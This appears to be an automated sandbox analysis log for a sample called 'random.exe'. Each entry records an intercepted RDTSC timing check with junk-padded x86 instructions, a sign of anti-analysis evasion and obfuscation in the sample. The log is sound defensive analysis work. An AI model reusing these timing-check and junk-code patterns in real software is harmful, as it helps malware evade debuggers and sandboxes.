Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10311CD second address: 10311D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10311D3 second address: 10311D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10340AF second address: 10340C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E56384h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10343AC second address: 10343CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10343CD second address: 10343D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10343D1 second address: 103442B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC8Fh 0x00000007 jnc 00007F8D38B7BC86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jmp 00007F8D38B7BC99h 0x0000001a pushad 0x0000001b popad 0x0000001c jo 00007F8D38B7BC86h 0x00000022 popad 0x00000023 jmp 00007F8D38B7BC99h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103442B second address: 1034432 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10346C9 second address: 10346EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8D38B7BC93h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10346EF second address: 10346F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10346F5 second address: 10346F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103B2C4 second address: 103B2F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E56384h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F8D38E5637Eh 0x0000000f push ecx 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop ecx 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103B2F4 second address: 103B2FA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103B7BB second address: 103B7C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103B7C1 second address: 103B7E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8D38B7BC94h 0x0000000c jno 00007F8D38B7BC86h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103B7E2 second address: 103B7E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103B98A second address: 103B9B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jo 00007F8D38B7BC86h 0x0000000e jnp 00007F8D38B7BC86h 0x00000014 jmp 00007F8D38B7BC91h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103BEE8 second address: 103BEEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103AD86 second address: 103AD8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103AD8C second address: 103ADB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8D38E56380h 0x00000009 jne 00007F8D38E56376h 0x0000000f popad 0x00000010 jmp 00007F8D38E5637Fh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103ADB6 second address: 103ADC1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 push edi 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103ADC1 second address: 103ADCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103ADCD second address: 103ADEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8D38B7BC8Ch 0x0000000f jmp 00007F8D38B7BC8Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103ADEF second address: 103ADF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104344F second address: 1043458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1043458 second address: 1043462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8D38E56376h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1043462 second address: 1043466 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104F357 second address: 104F361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8D38E56376h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104F361 second address: 104F368 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104F503 second address: 104F508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1052CC7 second address: 1052CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1052CCF second address: 1052CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8D38E56376h 0x0000000a popad 0x0000000b jmp 00007F8D38E56383h 0x00000010 pop edx 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007F8D38E5637Bh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1052A36 second address: 1052A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8D38B7BC86h 0x0000000a popad 0x0000000b jg 00007F8D38B7BC8Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1052A49 second address: 1052A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1055E11 second address: 1055E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1065B75 second address: 1065B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1065B7E second address: 1065B99 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8D38B7BC86h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8D38B7BC8Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1065B99 second address: 1065BA6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8D38E56376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10659F4 second address: 10659F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106C349 second address: 106C351 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106C351 second address: 106C385 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8D38B7BC99h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106C385 second address: 106C389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106C389 second address: 106C3A9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F8D38B7BC97h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106C7BD second address: 106C7C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F8D38E56376h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106CA3E second address: 106CA5A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8D38B7BC8Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push esi 0x0000000c jbe 00007F8D38B7BC86h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106CB62 second address: 106CB67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106CB67 second address: 106CB73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F8D38B7BC86h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10713F8 second address: 1071407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnp 00007F8D38E5637Ah 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F7C211 second address: F7C217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F7C217 second address: F7C21E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F7C21E second address: F7C223 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F7C223 second address: F7C245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F8D38E56385h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F7C245 second address: F7C249 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F7C249 second address: F7C24F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107E8ED second address: 107E8F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108E475 second address: 108E479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108E479 second address: 108E482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10907B6 second address: 10907BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1092494 second address: 10924A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 ja 00007F8D38B7BC86h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10924A4 second address: 10924AE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8D38E5638Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A755D second address: 10A757A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8D38B7BC94h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A757A second address: 10A757E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A757E second address: 10A7582 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A7705 second address: 10A770B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A78A7 second address: 10A78FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F8D38B7BC86h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007F8D38B7BC90h 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F8D38B7BC93h 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jp 00007F8D38B7BC9Dh 0x00000026 jmp 00007F8D38B7BC97h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A78FD second address: 10A7907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F8D38E56376h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A7907 second address: 10A7924 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A7A90 second address: 10A7AAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E56387h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A7AAB second address: 10A7AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A8095 second address: 10A8099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A8099 second address: 10A80A3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8D38B7BC86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A80A3 second address: 10A80A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A80A9 second address: 10A80C8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8D38B7BC93h 0x00000008 jmp 00007F8D38B7BC8Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F8D38B7BC86h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A80C8 second address: 10A80CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A80CC second address: 10A80D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A838B second address: 10A83A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E56384h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A83A3 second address: 10A83A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A83A9 second address: 10A83C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F8D38E56376h 0x00000009 jmp 00007F8D38E5637Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A9E80 second address: 10A9E9F instructions: 0x00000000 rdtsc 0x00000002 js 00007F8D38B7BC99h 0x00000008 jmp 00007F8D38B7BC93h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A9E9F second address: 10A9EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A9EA3 second address: 10A9EA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10AC8D9 second address: 10AC8DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10ACD88 second address: 10ACD8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10ACD8C second address: 10ACD90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10ACD90 second address: 10ACDBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F8D38B7BC94h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jbe 00007F8D38B7BC8Eh 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10AFCB4 second address: 10AFCBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10AFCBA second address: 10AFCBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10AFCBE second address: 10AFCD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E5637Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10AF7CA second address: 10AF7CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10AF7CE second address: 10AF7E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F8D38E5637Ah 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10B184F second address: 10B1855 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10B1855 second address: 10B185B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCB125 second address: FCB129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCB129 second address: FCB12D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCB12D second address: FCB133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCB133 second address: FCB139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 57306FC second address: 5730700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5730700 second address: 5730706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5730706 second address: 5730725 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edx, esi 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5730725 second address: 573079F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8D38E5637Bh 0x00000009 sbb ch, 0000004Eh 0x0000000c jmp 00007F8D38E56389h 0x00000011 popfd 0x00000012 mov cx, 5857h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d call 00007F8D38E56386h 0x00000022 pop esi 0x00000023 pushfd 0x00000024 jmp 00007F8D38E5637Bh 0x00000029 adc cx, 3F0Eh 0x0000002e jmp 00007F8D38E56389h 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 573079F second address: 57307EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F8D38B7BC8Eh 0x0000000f mov ebp, esp 0x00000011 jmp 00007F8D38B7BC90h 0x00000016 xchg eax, ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F8D38B7BC97h 0x0000001e rdtsc
